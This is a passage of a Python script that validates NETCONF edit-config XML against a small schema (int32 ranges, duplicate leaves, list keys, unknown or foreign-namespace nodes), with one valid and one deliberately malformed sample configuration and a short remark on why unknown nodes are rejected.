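    """'{namespace}name' -> 'name'."""
    return tag.rsplit("}", 1)[-1]


def check_type(value: str, ytype: str, path: str, errors: list) -> None:
    """Type check for the base types used in acme-system."""
    if ytype == "int32":
        try:
            n = int(value)
        except ValueError:
            errors.append(f"{path}: not an integer: {value!r}")
            return
        if not INT32_MIN <= n <= INT32_MAX:
            errors.append(f"{path}: int32 out of range: {n}")
    # "string" accepts any text


def validate_children(elem, schema: dict, path: str, errors: list) -> None:
    """Check the children of elem against the schema table for that level."""
    seen_leaves = set()
    list_keys = {}  # list name -> key values seen among these siblings
    for child in elem:
        if not child.tag.startswith("{" + NS + "}"):
            errors.append(f"{path}/{child.tag}: node outside the acme-system namespace")
            continue
        name = local_name(child.tag)
        node = schema.get(name)
        cpath = f"{path}/{name}"
        if node is None:
            errors.append(f"{cpath}: unknown node")
            continue
        kind = node["kind"]
        text = (child.text or "").strip()
        if kind == "leaf":
            if name in seen_leaves:
                errors.append(f"{cpath}: leaf appears more than once")
            seen_leaves.add(name)
            check_type(text, node["type"], cpath, errors)
        elif kind == "leaf-list":
            check_type(text, node["type"], cpath, errors)
        elif kind == "container":
            validate_children(child, node["children"], cpath, errors)
        elif kind == "list":
            key_el = child.find(f"{{{NS}}}{node['key']}")
            key = (key_el.text or "").strip() if key_el is not None else ""
            if not key:
                errors.append(f"{cpath}: missing key leaf '{node['key']}'")
            else:
                cpath = f"{cpath}[{node['key']}={key}]"
                if key in list_keys.setdefault(name, set()):
                    errors.append(f"{cpath}: duplicate key")
                list_keys[name].add(key)
            validate_children(child, node["children"], cpath, errors)


def validate_config(xml_text: str) -> list:
    """Validate the <config> wrapper of an <edit-config>; an empty list means valid."""
    root = ET.fromstring(xml_text)
    errors = []
    validate_children(root, SCHEMA, "", errors)
    return errors


# Constructed payloads: one valid, one with six distinct schema violations
VALID = """<config xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
  <system xmlns="http://acme.example.com/system">
    <host-name>srv1</host-name>
    <domain-search>example.com</domain-search>
    <domain-search>corp.example.com</domain-search>
    <interface><name>eth0</name><type>ethernetCsmacd</type><mtu>1500</mtu></interface>
    <interface><name>eth1</name><type>ethernetCsmacd</type><mtu>9000</mtu></interface>
  </system>
</config>"""
BAD = """<config xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
  <system xmlns="http://acme.example.com/system">
    <host-name>srv1</host-name>
    <host-name>srv2</host-name>
    <interface><name>eth0</name><mtu>2147483648</mtu></interface>
    <interface><name>eth0</name><mtu>abc</mtu></interface>
    <interface><type>ethernetCsmacd</type></interface>
    <speed>fast</speed>
  </system>
</config>"""

if __name__ == "__main__":
    print("valid payload:", validate_config(VALID))
    for err in validate_config(BAD):
        print("bad payload:", err)
```

Rejecting unknown and foreign-namespace nodes is deliberate: a server that silently ignores them lets a client believe a setting was applied when it was not, and a client that sends them learns nothing from an <ok/>.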